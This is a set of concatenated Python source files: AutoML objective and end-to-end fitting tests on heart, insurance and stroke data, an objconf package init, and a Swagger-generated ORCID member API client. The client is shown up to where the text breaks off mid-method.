result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_3():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_3",
task_mode="regression",
objective="MAE",
validation=True,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_4():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_4",
task_mode="regression",
objective="R2",
validation=True,
valid_size=0.15,
full_status=True,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_5():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_5",
task_mode="classification",
objective="precision",
validation=True,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_6():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_6",
task_mode="classification",
objective="hinge",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_7():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_7",
task_mode="classification",
objective="f1",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_8():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_8",
task_mode="regression",
objective="MSE",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_9():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_9",
task_mode="regression",
objective="MAX",
validation=True,
valid_size=0.15,
full_status=True,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_heart():
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
mol = My_AutoML.AutoTabular(
model_name="heart",
search_algo="GridSearch",
timeout=60,
)
mol.fit(data[features], data[response])
y_pred = mol.predict(data[features])
assert os.path.exists("tmp/heart/init.txt"), "Classification for Heart data failed to initialize."
assert mol._fitted, "Classification for Heart data failed to fit."
assert os.path.exists("tmp/heart/optimal_setting.txt"), "Classification for Heart data failed to find optimal setting."
def test_insurance():
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
mol = My_AutoML.AutoTabular(
model_name="insurance",
objective="MAE",
timeout=60,
)
mol.fit(data[features], data[response])
y_pred = mol.predict(data[features])
assert os.path.exists("tmp/insurance/init.txt"), "Regression for Insurance data failed to initialize."
assert mol._fitted, "Regression for Insurance data failed to fit."
assert os.path.exists("tmp/insurance/optimal_setting.txt"), "Regression for Insurance data failed to find optimal setting."
def test_insurance_R2():
from My_AutoML._hpo._base import AutoTabularBase
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
mol = AutoTabularBase(
model_name="insurance_R2",
task_mode="regression",
objective="R2",
max_evals=8,
timeout=60,
)
mol.fit(data[features], data[response])
assert os.path.exists("tmp/insurance_R2/init.txt"), "Regression for Insurance data failed to initialize."
assert mol._fitted, "Regression for Insurance data failed to fit."
assert os.path.exists("tmp/insurance_R2/optimal_setting.txt"), "Regression for Insurance data failed to find optimal setting."
def test_stroke_import_version():
# test load_data here
data = load_data().load("Appendix", "healthcare-dataset-stroke-data")
data = data["healthcare-dataset-stroke-data"]
features = list(data.columns)
features.remove("stroke")
response = ["stroke"]
mol = My_AutoML.AutoTabular(
model_name="stroke",
objective="auc",
timeout=60,
)
mol.fit(data[features], data[response])
assert os.path.exists("tmp/stroke/init.txt"), "Classification for Stroke data (import_version) failed to initialize."
assert mol._fitted, "Classification for Stroke data (import_version) failed to fit."
assert os.path.exists("tmp/stroke/optimal_setting.txt"), "Classification for Stroke data (import_version) failed to find optimal setting."
def test_stroke_loading():
# test load_data here
data = load_data().load("Appendix", "healthcare-dataset-stroke-data")
data = data["healthcare-dataset-stroke-data"]
features = list(data.columns)
features.remove("stroke")
response = ["stroke"]
mol = My_AutoML.AutoTabular(
model_name="stroke",
timeout=60,
)
mol.fit(data[features], data[response])
assert mol._fitted == True, "AutoTabular with loading failed to fit."
def test_stroke_with_limit():
# test load_data here
data = load_data().load("Appendix", "healthcare-dataset-stroke-data")
data = data["healthcare-dataset-stroke-data"]
features = list(data.columns)
features.remove("stroke")
response = ["stroke"]
mol = My_AutoML.AutoTabular(
model_name="no_valid",
encoder=["DataEncoding"],
imputer=["SimpleImputer"],
balancing=["no_processing"],
scaling=["no_processing"],
feature_selection=["no_processing"],
models=["DecisionTree"],
validation=False,
search_algo="GridSearch",
objective="precision",
timeout=60,
)
mol.fit(data[features], data[response])
assert mol._fitted == True, "AutoTabular with limited space failed to fit."
# File: objconf/__init__.py (repo: milosta/objconf, Python, Apache-2.0 license)
__all__ = ('Config', 'ExtraVals', 'Attribute', 'UNDEFINED')
from objconf.attributes import Attribute, UNDEFINED
from objconf.config import Config, ExtraVals
# File: orcid_api/apis/development_member_apiv30_dev1_api.py (repo: tenet-ac-za/NZ-ORCID-Hub, Python, MIT license)
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DevelopmentMemberAPIV30Dev1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_permission_notification_json(self, orcid, **kwargs):
"""
Add a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_permission_notification_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param NotificationPermission body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_permission_notification_json_with_http_info(orcid, **kwargs)
else:
(data) = self.add_permission_notification_json_with_http_info(orcid, **kwargs)
return data
def add_permission_notification_json_with_http_info(self, orcid, **kwargs):
"""
Add a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_permission_notification_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param NotificationPermission body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_permission_notification_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `add_permission_notification_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/notification-permission'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_two_legs']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_address_json(self, orcid, **kwargs):
"""
Add an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_address_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_address_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_address_json_with_http_info(orcid, **kwargs)
return data
def create_address_json_with_http_info(self, orcid, **kwargs):
"""
Add an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_address_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_address_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_address_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_education_json(self, orcid, **kwargs):
"""
Create an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_education_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Education body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_education_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_education_json_with_http_info(orcid, **kwargs)
return data
def create_education_json_with_http_info(self, orcid, **kwargs):
"""
Create an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_education_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Education body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_education_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_education_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_employment_json(self, orcid, **kwargs):
"""
Create an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_employment_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Employment body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_employment_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_employment_json_with_http_info(orcid, **kwargs)
return data
def create_employment_json_with_http_info(self, orcid, **kwargs):
"""
Create an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_employment_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Employment body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_employment_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_employment_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_external_identifier_json(self, orcid, **kwargs):
"""
Add external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_external_identifier_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_external_identifier_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_external_identifier_json_with_http_info(orcid, **kwargs)
return data
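    # Async sketch (hypothetical): passing `callback` returns immediately and
    # invokes the function with the deserialized response (here None, per the
    # docstring) once the request completes.
    #
    #   def on_created(response):
    #       print('external identifier added')
    #   api.create_external_identifier_json(orcid, body=ext_id, callback=on_created)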
def create_external_identifier_json_with_http_info(self, orcid, **kwargs):
"""
Add external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_external_identifier_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_external_identifier_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_external_identifier_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_funding_json(self, orcid, **kwargs):
"""
Create a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_funding_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Funding body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_funding_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_funding_json_with_http_info(orcid, **kwargs)
return data
def create_funding_json_with_http_info(self, orcid, **kwargs):
"""
Create a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_funding_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Funding body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
